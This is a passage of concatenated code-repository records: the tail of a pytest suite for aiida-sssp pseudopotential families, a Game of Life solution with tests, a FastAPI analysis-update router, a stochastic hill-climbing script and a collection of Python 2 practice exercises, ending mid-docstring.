label)\n\n assert 'contains pseudo potentials with duplicate elements' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n\n # Create an empty folder in the pseudo directory, which is not allowed\n dirpath_sub = os.path.join(dirpath, 'random_sub_folder')\n os.makedirs(dirpath_sub)\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(dirpath, label)\n\n assert 'contains at least one entry that is not a file' in str(exception.value)\n assert SsspFamily.objects.count() 
== 0\n assert orm.UpfData.objects.count() == 0\n os.rmdir(dirpath_sub)\n\n # Create a dummy file that does not have a valid UPF format\n with open(filepath, 'w') as handle:\n handle.write('invalid pseudo format')\n\n with pytest.raises(ValueError) as exception:\n SsspFamily.create_from_folder(dirpath, label)\n\n assert 'failed to parse' in str(exception.value)\n assert SsspFamily.objects.count() == 0\n assert orm.UpfData.objects.count() == 0\n\n\ndef test_create_from_folder_with_parameters(clear_db, filepath_pseudos, sssp_parameter_filepath):\n \"\"\"Test the `SsspFamily.create_from_folder` class method when passing a file with pseudo metadata.\"\"\"\n with pytest.raises(TypeError):\n SsspFamily.create_from_folder(filepath_pseudos, 'SSSP', filepath_parameters={})\n\n # Test directly from filepath\n family = SsspFamily.create_from_folder(filepath_pseudos, 'SSSP/1.0', filepath_parameters=sssp_parameter_filepath)\n assert isinstance(family, SsspFamily)\n assert family.is_stored\n\n parameters = family.get_parameters_node()\n assert parameters.family_uuid == family.uuid\n\n # Test from filelike object\n with open(sssp_parameter_filepath) as handle:\n family = SsspFamily.create_from_folder(filepath_pseudos, 'SSSP/1.1', filepath_parameters=handle)\n assert isinstance(family, SsspFamily)\n assert family.is_stored\n\n parameters = family.get_parameters_node()\n assert parameters.family_uuid == family.uuid\n\n\ndef test_get_parameters_node(clear_db, create_sssp_family, create_sssp_parameters):\n \"\"\"Test the `SsspFamily.get_parameters_node` method.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(exceptions.NotExistent):\n family.get_parameters_node()\n\n parameters = create_sssp_parameters(uuid=family.uuid).store()\n\n assert isinstance(family.get_parameters_node(), SsspParameters)\n assert family.get_parameters_node().uuid == parameters.uuid\n\n\ndef test_parameters(clear_db, create_sssp_family, create_sssp_parameters):\n \"\"\"Test the `SsspFamily.parameters` property.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(exceptions.NotExistent):\n family.parameters\n\n parameters = create_sssp_parameters(uuid=family.uuid).store()\n\n assert isinstance(family.parameters, dict)\n assert family.parameters == parameters.attributes\n\n\ndef test_get_parameter(clear_db, create_sssp_family, create_sssp_parameters, sssp_parameter_metadata):\n \"\"\"Test the `SsspFamily.get_parameter` method.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(exceptions.NotExistent):\n family.get_parameter('Ar', 'cutoff')\n\n parameters = create_sssp_parameters(uuid=family.uuid).store()\n\n with pytest.raises(KeyError):\n family.get_parameter('Br', 'cutoff')\n\n with pytest.raises(KeyError):\n family.get_parameter('Ar', 'parameter')\n\n element = 'Ar'\n key_cutoff_wfc = 'cutoff_wfc'\n key_cutoff_rho = 'cutoff_rho'\n\n assert family.get_parameter(element, key_cutoff_wfc) == parameters.get_attribute(element)[key_cutoff_wfc]\n assert family.get_parameter(element, key_cutoff_rho) == parameters.get_attribute(element)[key_cutoff_rho]\n\n\ndef test_get_cutoffs(clear_db, create_sssp_family, create_sssp_parameters, create_structure):\n \"\"\"Test the `SsspFamily.get_cutoffs` method.\"\"\"\n family = create_sssp_family()\n parameters = create_sssp_parameters(uuid=family.uuid).store().attributes\n structure = create_structure(site_kind_names=['Ar', 'He', 'Ne'])\n\n with pytest.raises(ValueError):\n family.get_cutoffs(elements=None, structure=None)\n\n with pytest.raises(ValueError):\n 
family.get_cutoffs(elements='Ar', structure=structure)\n\n with pytest.raises(TypeError):\n family.get_cutoffs(elements=False, structure=None)\n\n with pytest.raises(TypeError):\n family.get_cutoffs(elements=None, structure='Ar')\n\n expected = parameters['Ar']\n assert family.get_cutoffs(elements='Ar') == (expected['cutoff_wfc'], expected['cutoff_rho'])\n assert family.get_cutoffs(elements=('Ar',)) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n expected = parameters['He']\n assert family.get_cutoffs(elements=('Ar', 'He')) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n expected = parameters['Ne']\n assert family.get_cutoffs(structure=structure) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n # Try structure with multiple kinds with the same element\n expected = parameters['He']\n structure = create_structure(site_kind_names=['He1', 'He2'])\n assert family.get_cutoffs(structure=structure) == (expected['cutoff_wfc'], expected['cutoff_rho'])\n\n\ndef test_get_pseudos(clear_db, create_sssp_family, create_sssp_parameters, create_structure):\n \"\"\"Test the `SsspFamily.get_pseudos` method.\"\"\"\n family = create_sssp_family()\n\n with pytest.raises(TypeError):\n family.get_pseudos('Ar')\n\n expected = {\n 'Ar': family.get_pseudo('Ar'),\n 'He': family.get_pseudo('He'),\n 'Ne': family.get_pseudo('Ne'),\n }\n structure = create_structure(site_kind_names=['Ar', 'He', 'Ne'])\n assert family.get_pseudos(structure) == expected\n\n expected = {\n 'Ar1': family.get_pseudo('Ar'),\n 'Ar2': family.get_pseudo('Ar'),\n }\n structure = create_structure(site_kind_names=['Ar1', 'Ar2'])\n assert family.get_pseudos(structure) == expected\n","repo_name":"aiidateam/aiida-sssp","sub_path":"tests/groups/test_family.py","file_name":"test_family.py","file_ext":"py","file_size_in_byte":12222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3483083466","text":"\"\"\"\nThis problem was asked by Dropbox.\n\nConway's Game of Life takes place on an infinite\ntwo-dimensional board of square cells.\nEach cell is either dead or alive, and at each tick, the following rules apply:\n\nAny live cell with less than two live neighbours dies.\nAny live cell with two or three live neighbours remains living.\nAny live cell with more than three live neighbours dies.\nAny dead cell with exactly three live neighbours becomes a live cell.\nA cell neighbours another cell if it is horizontally,\nvertically, or diagonally adjacent.\n\nImplement Conway's Game of Life.\nIt should be able to be initialized with a starting list of live\ncell coordinates and the number of steps it should run for.\nOnce initialized, it should print out the board state at each step.\nSince it's an infinite board, print out only the relevant coordinates,\ni.e. 
from the top-leftmost live cell to bottom-rightmost live cell.\n\nYou can represent a live cell with an asterisk (*)\nand a dead cell with a dot (.).\n\"\"\"\nimport unittest\nfrom operator import itemgetter\nfrom random import choice\nfrom typing import List, Tuple\n\n\ndef create_board(living: List[Tuple[int, int]]) -> List[List[str]]:\n    min_r = min(living, key=itemgetter(0))[0]\n    max_r = max(living, key=itemgetter(0))[0]\n    rows = max_r - min_r + 1\n    min_c = min(living, key=itemgetter(1))[1]\n    max_c = max(living, key=itemgetter(1))[1]\n    cols = max_c - min_c + 1\n    board = [['.'] * cols for _ in range(rows)]\n    for cell in living:\n        x = cell[0] - min_r\n        y = cell[1] - min_c\n        board[x][y] = '*'\n    return board\n\n\ndef print_board(board: List[List[str]]) -> None:\n    for row in board:\n        print(''.join(row))\n\n\ndef count_neighbours(board: List[List[str]], x: int, y: int) -> int:\n    height = len(board)\n    width = len(board[0])\n    living_neighbours = 0\n\n    # check for living left of cell\n    if y > 0 and board[x][y-1] == '*':\n        living_neighbours += 1\n\n    # check for living top-left of cell\n    if x > 0 and y > 0 and board[x-1][y-1] == '*':\n        living_neighbours += 1\n\n    # check for living top-right of cell\n    if x > 0 and y < width - 1 and board[x-1][y+1] == '*':\n        living_neighbours += 1\n\n    # check for living bottom-left of cell\n    if x < height - 1 and y > 0 and board[x+1][y-1] == '*':\n        living_neighbours += 1\n\n    # check for living bottom-right of cell\n    if x < height - 1 and y < width - 1 and board[x+1][y+1] == '*':\n        living_neighbours += 1\n\n    # check for living above cell\n    if x > 0 and board[x-1][y] == '*':\n        living_neighbours += 1\n\n    # check for living below cell\n    if x < height - 1 and board[x+1][y] == '*':\n        living_neighbours += 1\n\n    # check for living right of cell\n    if y < width - 1 and board[x][y+1] == '*':\n        living_neighbours += 1\n    return living_neighbours\n\n\ndef update_board(board: List[List[str]]) -> None:\n    # Conway's rules apply to every cell simultaneously, so neighbour counts\n    # must be taken from the current generation before any cell is rewritten;\n    # updating in place while counting would let earlier updates corrupt the\n    # counts of cells visited later.\n    counts = [[count_neighbours(board, ix, ij) for ij in range(len(row))]\n              for ix, row in enumerate(board)]\n    for ix, row in enumerate(board):\n        for ij in range(len(row)):\n            neighbours = counts[ix][ij]\n            if neighbours == 3:\n                board[ix][ij] = '*'\n            elif neighbours == 2 and board[ix][ij] == '*':\n                continue\n            else:\n                board[ix][ij] = '.'\n\n\ndef game_of_life(living: List[Tuple[int, int]], steps: int) -> None:\n    board = create_board(living)\n    print('Initial boardstate:')\n    print_board(board)\n    print('\\n')\n    for i in range(1, steps + 1):\n        update_board(board)\n        print(f'Iteration {i} boardstate:')\n        print_board(board)\n        print('\\n')\n\n\nclass TestSolution(unittest.TestCase):\n    def test_count_neighbours_none(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '.']\n        ], 0, 1), 0)\n        self.assertEqual(count_neighbours([\n            ['.'],\n            ['.'],\n            ['.']\n        ], 1, 0), 0)\n\n    def test_count_neighbours_top(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '*', '.'],\n            ['.', '.', '.'],\n            ['.', '.', '.']\n        ], 1, 1), 1)\n\n    def test_count_neighbours_top_right(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '*'],\n            ['.', '.', '.'],\n            ['.', '.', '.']\n        ], 1, 1), 1)\n\n    def test_count_neighbours_top_left(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['*', '.', '.'],\n            ['.', '.', '.'],\n            ['.', '.', '.']\n        ], 1, 1), 1)\n\n    def test_count_neighbours_left(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '.'],\n            ['*', '.', '.'],\n            ['.', '.', '.']\n        ], 1, 1), 1)\n\n    def test_count_neighbours_right(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '.'],\n            ['.', '.', '*'],\n            ['.', '.', '.']\n        ], 1, 1), 1)\n\n    def 
test_count_neighbours_bottom(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '.'],\n            ['.', '.', '.'],\n            ['.', '*', '.']\n        ], 1, 1), 1)\n\n    def test_count_neighbours_bottom_right(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '.'],\n            ['.', '.', '.'],\n            ['.', '.', '*']\n        ], 1, 1), 1)\n\n    def test_count_neighbours_bottom_left(self) -> None:\n        self.assertEqual(count_neighbours([\n            ['.', '.', '.'],\n            ['.', '.', '.'],\n            ['*', '.', '.']\n        ], 1, 1), 1)\n\n    def test_create_board(self) -> None:\n        self.assertEqual(create_board([(1, 0), (3, 1)]), [\n            ['*', '.'],\n            ['.', '.'],\n            ['.', '*']\n        ])\n\n    def test_game_of_life(self) -> None:\n        # output is not checked, only that it runs without failure\n        members = 300\n        x_options = range(25)\n        y_options = range(50)\n        iters = 10\n        game_of_life([\n            (choice(x_options) + 3, choice(y_options) + 20)\n            for _ in range(members)\n        ], iters)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"Nr90/daily_coding_problem","sub_path":"p39/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28581692754","text":"from fastapi import APIRouter, HTTPException, Depends\nfrom fastapi_utils.tasks import repeat_every\nfrom fastapi.responses import JSONResponse\n\nfrom ..database.models.http_responses import *\nfrom ..routers.authentication import User, authenticate\nfrom ..database.analysis import update\n\n\nrouter = APIRouter(\n    tags=[\"analysis\"]\n)\n\n\n# <------------------------>\n# API-Analysis\n# <------------------------>\n\n@router.get(\"/update\", responses=default_responses)\nasync def analysis(user: User = Depends(authenticate)):\n    if user[\"access_lvl\"] != 0 and user[\"access_lvl\"] != 1:\n        raise HTTPException(status_code=403, detail=\"Insufficient authorization level!\")\n\n    print(\"updating...\")\n    update()\n    print(\"updated!\")\n\n    return JSONResponse(status_code=200, content={\"acknowledged\": True})\n\n@router.on_event(\"startup\")\n@repeat_every(seconds=60 * 60 * 24)\nasync def __analysis():\n    print(\"updating...\")\n    update()\n    print(\"updated!\")\n","repo_name":"TILT-RiskOfDataBreach/backend","sub_path":"analysis/app/routers/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6065647621","text":"#!/usr/bin/env python3\n\nimport random\n\n\"\"\"\n2.4\n\nStochastic Hill Climbing iterates the process of randomly\nselecting a neighbor for a candidate solution and only accepting\nit if it results in an improvement. The strategy was proposed to\naddress the limitations of deterministic hill climbing techniques\nthat were likely to get stuck in local optima due to their greedy\nacceptance of neighboring moves.\n\nThis code implements the Random Mutation Hill Climbing algorithm,\na specific instance of Stochastic Hill Climbing. 
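Note that this implementation also accepts a\nmutant whose cost ties the current candidate's, so the search can drift\nacross plateaus rather than stalling on them. 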
It is applied to\na binary string optimization problem called \"One Max\": reach a\nstring of all '1' bits, where the cost function reports the\nnumber of '1' bits in a given string.\n\nImplementation notes:\nThe reference implementation uses a list of (one-character) strings.\nI opted to use a str object directly.\n\n@author Chad Estioco\n\"\"\"\n
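\n# A small illustrative helper (an addition for clarity, not part of the\n# reference algorithm): it performs one accept/reject step of the loop in\n# search() below, reusing this module's onemax() and random_neighbor().\n# The starting string is an arbitrary example; nothing below calls this.\ndef example_accept_step(candidate=\"0110\"):\n\tmutant = random_neighbor(candidate)  # flip exactly one randomly chosen bit\n\tif onemax(mutant) >= onemax(candidate):\n\t\tcandidate = mutant  # accept: the onemax cost never decreases\n\treturn candidate\n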
\ndef onemax(vector):\n\tlimit = len(vector)\n\tone_count = 0\n\t\n\tfor i in range(limit):\n\t\tif vector[i] == \"1\":\n\t\t\tone_count += 1\n\t\n\treturn one_count\n\ndef random_bitstring(num_bits):\n\tdef generator():\n\t\tbit = None\n\t\t\n\t\tif random.random() < 0.5:\n\t\t\tbit = \"1\"\n\t\telse:\n\t\t\tbit = \"0\"\n\t\t\n\t\treturn bit\n\t\n\treturn \"\".join(generator() for i in range(num_bits))\n\ndef random_neighbor(bitstring):\n\tmutant = bitstring\n\tlimit = len(bitstring)\n\tpos = random.randint(0, limit - 1)\n\t\n\tif mutant[pos] == \"1\":\n\t\tmutant = \"\".join((mutant[0:pos], \"0\" ,mutant[pos + 1:limit]))\n\telse:\n\t\tmutant = \"\".join((mutant[0:pos], \"1\" ,mutant[pos + 1:limit]))\n\t\n\treturn mutant\n\ndef search(max_iterations, num_bits):\n\tcandidate = {}\n\tcandidate[\"vector\"] = random_bitstring(num_bits)\n\tcandidate[\"cost\"] = onemax(candidate[\"vector\"])\n\t\n\tfor i in range(max_iterations):\n\t\tneighbor = {}\n\t\tneighbor[\"vector\"] = random_neighbor(candidate[\"vector\"])\n\t\tneighbor[\"cost\"] = onemax(neighbor[\"vector\"])\n\t\t\n\t\tif neighbor[\"cost\"] >= candidate[\"cost\"]:\n\t\t\tcandidate = neighbor\n\t\t\n\t\tprint(\"Iteration \" + str(i) + \": best = \" + str(candidate[\"cost\"]))\n\t\t\n\t\tif candidate[\"cost\"] == num_bits:\n\t\t\tbreak\n\t\n\treturn candidate\n\nif __name__ == \"__main__\":\n\t# problem configuration\n\tnum_bits = 64\n\t\n\t# algorithm configuration\n\tmax_iterations = 1000\n\t\n\t# execute the algorithm\n\tbest = search(max_iterations, num_bits)\n\tprint(\"Done. Best Solution: cost = \" + str(best[\"cost\"]) + \", v = \" + str(best[\"vector\"]))\n","repo_name":"mostafaashraf413/CleverAlgorithms-Python","sub_path":"python/stochastic/stochastic_hill_climbing.py","file_name":"stochastic_hill_climbing.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"72737798595","text":"'''\nSome toy problems to practice python. These are not the most 'pythonic' \nways to solve these problems, but they are simple ways, which are very \nbasic-syntax-heavy. The purpose of these problems is to practice using\nbasic python syntax, and to start thinking in a code-y sort of way (for \nthose for whom this is their first coding language)\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nfrom collections import defaultdict\nimport re\nimport random\nfrom scipy import integrate\nimport argparse\n\n### 1 ###\ndef factorial(x):\n    '''\n    A function to compute factorial(x),\n    where x is an integer.\n    That is, fact(x) = 1*2*3*4*...*x\n\n    Returns an int.\n    '''\n    i = 1\n    y = x\n\n    while i < y:\n        x *= i\n        i += 1\n\n    return x\n\n### 2 ###\ndef modulus(x, modu):\n    '''\n    Computes x mod modu.\n\n    Returns a float or an int.\n    '''\n    signx = x/abs(x)\n    signmod = modu/abs(modu)\n\n    y = abs(x)\n    moduy = abs(modu)\n\n    while y > moduy:\n        y -= moduy\n\n    if signx < 0.:\n        if signmod > 0.:\n            return signx*y+modu\n        else:\n            return -y\n\n    else:\n        if signmod < 0.:\n            return signx*y+modu\n        else:\n            return y\n\n### 3 ###\ndef list_of_lists(l, m):\n    '''\n    Makes a list of lists.\n\n    Returns a nested list.\n    '''\n    abet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n            'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n            'q', 'r', 's', 't', 'u', 'v', 'w', 'x',\n            'y', 'z']\n    lst = [[abet[mm] for ll in xrange(l)] for mm in xrange(m)]\n    return lst\n\n### 4 ###\ndef lists_of_list(l, m):\n    '''\n    Makes lists of a list.\n\n    Returns a nested list.\n    '''\n    abet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n            'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p',\n            'q', 'r', 's', 't', 'u', 'v', 'w', 'x',\n            'y', 'z']\n    lst = [[abet[ll] for ll in xrange(l)] for mm in xrange(m)]\n    return lst\n\n### 5 ###\ndef tup_to_list(list_of_tups):\n    '''\n    Takes a list of tuples, and returns a\n    list of lists, with the first list containing\n    the first entry in the tuples, the\n    second list containing the second\n    entry in the tuples.\n\n    Returns a list of lists.\n    '''\n    lst1 = []\n    lst2 = []\n    for tup in list_of_tups:\n        lst1.append(tup[0])\n        lst2.append(tup[1])\n    return lst1, lst2\n\n### 6 ###\ndef tuple_to_dict(data):\n    '''\n    Takes a list of tuples, and returns a\n    dictionary whose keys are the first entries\n    of the tuples, and whose values are lists of\n    the second entries that share that key.\n\n    Returns a dictionary.\n    '''\n    dict_tup = {}\n    for tup in data:\n        try:\n            dict_tup[tup[0]].append(tup[1])\n        except KeyError:\n            dict_tup[tup[0]] = [tup[1]]\n    return dict_tup\n\n### 7 ###\ndef sort_tups(data):\n    '''\n    Takes a list of tuples, and returns a\n    list of the same tups, sorted by the first\n    tuple entry.\n\n    Returns a list of tuples.\n    '''\n    sorted_tup = sorted(data, key=lambda tup: tup)\n\n    return sorted_tup\n\n### 8 ###\ndef remove_empty_tuples(tup_list):\n    '''\n    Removes empty tuples from a list of tuples.\n\n    Returns a list of tuples.\n    '''\n    tple = [tpl for tpl in tup_list if tpl]\n    return tple\n\n### 9 ###\ndef sum_arr(x0, x1, xi=1.0):\n    '''\n    A function to sum from x0, with x1 steps of size\n    xi, keeping the result for each successive step.\n    default is xi = 1\n\n    Returns a numpy array.\n    '''\n    step = x0\n    nsteps = x1\n    output = np.zeros(nsteps+1)\n    count = 0\n    output[0] = step\n    while count < x1:\n        count += 1\n        step += xi\n        output[count] = step\n    return output\n\n### 10 ###\ndef plot_x_pow_n(xmin, xmax, n, numpts=100):\n    '''\n    Plots x vs x^n and saves it.\n\n    Returns nothing.\n    '''\n    x = np.linspace(xmin, xmax, numpts)\n    plt.close()\n\n    # Basic plot\n    plt.plot(x, x**n)\n    # With some tweaking and stuff. 
There's so much you can customize...\n    plt.plot(x, x**n, color = 'm', linewidth = 8, linestyle = ':', dashes = (30,10) )\n\n    plt.axes().set_xlabel(\"here's an xlabel\")\n    plt.axes().set_ylabel('and a ylabel')\n    plt.savefig('plot_eg.png')\n\n### 11 ###\ndef fourxfour_plot(xmin, xmax, numpts=100):\n    '''\n    Plots a 4x4 set of axes, showing\n    x^1, x^2, x^3, and x^4 respectively.\n\n    Returns nothing.\n    '''\n    x = np.linspace(xmin, xmax, numpts)\n    plt.close()\n    fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2)\n\n    # Basic plot\n    ax1.plot(x, x**1)\n    ax2.plot(x, x**2)\n    ax3.plot(x, x**3)\n    ax4.plot(x, x**4)\n    \n    fig.tight_layout()\n    fig.savefig('fxf_plot_eg.png')\n\n### 12 ###\ndef scatterplot_random(xmin, xmax, numpts=100):\n    '''\n    Produces a scatterplot of random points\n    in the range [xmin,xmax]\n\n    Returns nothing.\n    '''\n    numpts = xrange(numpts)\n    # uniform() draws floats in [xmin, xmax]; randrange() accepts only\n    # integer arguments, so it would fail here with a float step\n    x = [random.uniform(xmin, xmax) for n in numpts]\n    y = [random.uniform(xmin, xmax) for n in numpts]\n    \n    plt.close()\n    plt.scatter(x,y, 30, color = 'r')\n    plt.savefig('scatter_eg.png')\n\n### 13 ###\ndef twodim_xsq_ysq(xmin, xmax, numpix=100):\n    '''\n    Produces a two-dimensional image\n    (as opposed to a scatter plot)\n    of x^2 + y^2 in the range [xmin,xmax]\n\n    Note that when using matplotlib.pyplot.imshow()\n    you should always add the arguments \n    interpolation='nearest' and origin='lower'. \n\n    For some reason imshow by default smooths your image,\n    and setting interpolation='nearest' turns this off \n    so the true pixels are shown. \n    The second argument is to set the origin of the image\n    to the lower left hand corner of the image. For some \n    reason this is not the default!\n\n    Returns nothing.\n    '''\n    \n    x = np.linspace(0, numpix-1, numpix)\n    y = np.linspace(0, numpix-1, numpix)\n    \n    xgrid, ygrid = np.meshgrid(x,y)\n\n    plt.close()\n    plt.imshow(xgrid**2+ygrid**2, interpolation='nearest', origin='lower')\n    plt.savefig('imshow_eg.png')\n\n### 14 ###\ndef read_data(filename, ncols, delimiter = ','):\n    '''\n    Reads data from a .csv file and\n    returns each column in a list,\n    without using the csv module.\n\n    'U' means universal, and allows for newline characters\n    from any operating system. E.g. Excel on OSX will use\n    funky newlines that otherwise would cause issues.\n    The alternative is to use 'r+', which means regular read\n    with extra permissions.\n    Go to section 7.2 here:\n    https://docs.python.org/2/tutorial/inputoutput.html\n    for more on different read/write instructions for\n    python.\n\n    Returns an array containing the data.\n    '''\n    with open(filename, 'U') as csvfile:\n        result = [[] for n in xrange(ncols)]\n        for row in csvfile:\n            cols = row.strip('\\n').split(delimiter)\n            for i,col in enumerate(cols):\n                result[i].append(col)\n    return np.array(result)\n\n### 14 *alternative* ###\ndef read_csv(filename, ncols, delimiter = ','):\n    '''\n    Reads data from a .csv file and\n    returns each column in a list,\n    using the csv module.\n    The csv module handles data containing\n    quote characters better than simple row\n    reading as in read_data. The alternative is\n    to force the data to be read as a regular\n    expression by using the regex module.\n    Google this to learn more.\n\n    'U' means universal, and allows for newline characters\n    from any operating system. E.g. Excel on OSX will use\n    funky newlines that otherwise would cause issues.\n    The alternative is to use 'r+', which means regular read\n    with extra permissions.\n    Go to section 7.2 here:\n    https://docs.python.org/2/tutorial/inputoutput.html\n    for more on different read/write instructions for\n    python.\n\n    Returns an array containing the data.\n    '''\n    with open(filename, 'U') as csvfile:\n        reader = csv.reader(csvfile,\n                            delimiter=delimiter,\n                            quotechar='\"')\n        result = [[] for n in xrange(ncols)]\n        for row in reader:\n            for i,col in enumerate(row):\n                result[i].append(col)\n    return np.array(result)\n\n### 15 ###\ndef write_data(data, savename, delimiter=','):\n    '''\n    writes the data to a file called\n    savename, with fields separated by\n    the delimiter.\n    'data' must be row by column\n    Returns nothing.\n    '''\n    with open(savename,'w+') as f:\n        for row in data:\n            row = [str(r) for r in row] # make sure they're strings\n            f.write(delimiter.join(row)+'\\n')\n\n### 16 ###\ndef join_csvs(filenames, ncols, join_ons, delimiters=None, savename='joined_data.csv', header=None):\n    '''\n    Takes a list of csv files and joins them on a given common column.\n    Assumes there is no missing data in the files.\n    You need to specify the column in each csv which is common with the\n    other csv files, that is to be joined on.\n    You also need to specify how many columns each csv has.\n    Writes the joined data to savename, with the joining column first.\n    If a header is specified for the joining column this is put at the\n    top of the output file.\n\n    Returns nothing.\n    '''\n    if delimiters==None:\n        # Assume comma-separated values if no delimiter is specified\n        delimiters = [',' for f in filenames]\n\n    # This forces each data to be a numpy array because we assume it is later on\n    datas = [np.array(read_csv(f, nc, delimiter=d)) \\\n             for f,nc,d in zip(filenames,ncols,delimiters)]\n\n    dicts = [{} for d in datas]\n\n    for data, join_on, a_dict in zip(datas, join_ons, dicts):\n        # data is assumed to be an array\n        data = data.T # change from col by row to row by col\n        for row in data:\n            # when you add lists they join together, \n            # when you add arrays they must be the same shape and \n            # you add the values of the elements, elementwise\n            # Hence we make these lists so we can avoid the row \n            # we join on\n            a_dict[row[join_on]]=list(row[:join_on])+list(row[join_on+1:]) \n\n    # A defaultdict will automatically produce an entry for \n    # any key that doesn't yet exist. \n    # A regular dict like {} doesn't do this. \n    dd = defaultdict(list)\n    # Join the dictionaries on the selected columns\n    for d in dicts:\n        for key, values in d.iteritems():\n            for value in values:\n                dd[key].append(value)\n\n    # Put the joined info back into an array and write to file\n    data = []\n    # Ensure the header is the first thing written to file\n    if header:\n        data.append([header]+dd[header])\n    for key, values in dd.iteritems():\n        if key==header:\n            continue # We already have it at the top of the data\n        data.append([key]+values)\n    data = np.array(data)\n    write_data(data, savename, delimiter=',')\n\n### 17 ###\ndef hist_plot(filename, savename, ncol, histcol, delimiter=',', header=False):\n    '''\n    Plots a histogram of a column from a datafile\n    specified by filename. The column does NOT need to be\n    numerical. 
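Category counts are assembled with a\n    defaultdict and drawn as a bar chart. 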
If you're just trying to histogram numerical\n    data you should use numpy.histogram().\n    You need to specify the savename to save the plot to,\n    the number of columns in the file, and the column\n    to histogram. Different delimiters can also be\n    optionally specified.\n    Assumes there is no header. If there is, set header=True\n    and the first row will be skipped.\n\n    Returns nothing.\n    '''\n    data = np.array(read_csv(filename, ncol, delimiter=delimiter))\n    data_to_hist = data[histcol]\n    # for line in set(data_to_hist):\n    #     print line\n    if header:\n        data_to_hist = data_to_hist[1:]\n\n    # A defaultdict will automatically produce an entry for \n    # any key that doesn't yet exist. \n    # A regular dict like {} doesn't do this. \n    datadict = defaultdict(int)\n    for dat in data_to_hist:\n        # Every time an item is found, add 1 to its entry\n        datadict[dat] += 1\n\n    # Split up the keys and data in the dictionary\n    # into two tuples\n    item, number = zip(*datadict.items())\n    # Make a set of indices for the data bins (the keys)\n    index, item = zip(*enumerate(item))\n\n    plt.clf()\n    # Plot the number of each item against the item index\n    plt.bar(index, number, width = 1.)\n    # Shift the ticks so they sit in the middle of the bins\n    plt.axes().set_xticks([ind+0.5 for ind in index])\n    # Label the bins with the items (as opposed to the indices)\n    plt.axes().set_xticklabels(item, rotation = 20, fontsize = 30)\n    plt.savefig(savename)\n\n### 18 ###\ndef count_instances_simple(filename, searchterm, ncol, thiscol = None, delimiter=',', header=False):\n    '''\n    Counts the number of instances of a string or\n    number in a file, either from one column in the\n    file, or from the whole file.\n\n    Returns the number of whole word/whole number\n    instances, the number of instances including\n    within words/numbers, a list of locations\n    giving the column and row number of each\n    occurrence of the word/number for the\n    whole word/number search, and the same for\n    the sub-word/number search.\n    '''\n    data = np.array(read_csv(filename, ncol, delimiter=delimiter))\n\n    if header:\n        data = data[:,1:]\n    if thiscol != None:\n        data = data[thiscol]\n\n    n_instances_whole = 0\n    n_instances_all = 0\n    \n    loc_whole = []\n    loc_all = []\n    for i, col in enumerate(data):\n        for j, row in enumerate(col):\n\n            # Whole word\n            st = str(searchterm).upper()\n            srow = str(row).upper()\n            \n            re_search_whole = r'\\b'\n            re_search_whole += '('+st+')'\n            re_search_whole += r'\\b'\n            instances_whole = re.findall(re_search_whole, srow)\n            \n            re_search_all = r''\n            re_search_all += '('+st+')'\n            instances_all = re.findall(re_search_all, srow)\n\n            n_instances_whole +=len(instances_whole)\n            n_instances_all +=len(instances_all)\n\n            # Python sees an empty list as boolean False, \n            # and any non-empty list as boolean True, \n            # so the checks below are the same as saying \n            # if len(instances)>0. They must test the per-cell\n            # match lists, not the running totals, otherwise every\n            # cell after the first hit would be recorded.\n            if instances_whole:\n                loc_whole.append( (i, j) )\n            if instances_all:\n                loc_all.append( (i, j) )\n\n\n    return n_instances_whole, n_instances_all, loc_whole, loc_all\n\n### 19 ###\ndef integrate_invexp(a, b):\n    '''\n    Integrate the function a*e^(-b*x) from\n    0 to infinity. 
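For b > 0 this has the closed form a/b,\n    which gives a quick check on the numerical result.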
\n\n    Returns the result of the integral.\n    '''\n\n    def invexp(x, a, b):\n        return a * np.exp(- b * x)\n\n    res, err = integrate.quad(invexp, 0, np.inf, args = (a, b))\n\n    return res\n\n### 20 ###\ndef parse_arguments():\n    '''\n    Parse the command line \n    arguments of a program.\n\n    Returns the parsed arguments.\n    '''\n    \n    DEFAULT_ARG_VALUE = 'this_is_the_default_value'\n\n    parser = argparse.ArgumentParser(description='Example parser')\n    \n    parser.add_argument(\n        '--first_arg', # The name of the input variable\n        required=True, # Is it an optional variable?\n        metavar='THE_FIRST_ARG', # For error-message printing purposes\n        type=float, # The datatype of the input variable\n        # A description of the variable, for error-message purposes\n        help='the first argument in this test code is a float'\n    )\n\n    parser.add_argument(\n        '--second_arg',\n        required=False,\n        metavar='THE_SECOND_ARG',\n        type=str,\n        help='the second argument in this test code is a string',\n        default=DEFAULT_ARG_VALUE\n    )\n\n    return parser.parse_args()\n\ndef main():\n    '''\n    This is a special function name.\n    Everything in your code should\n    run inside main()\n    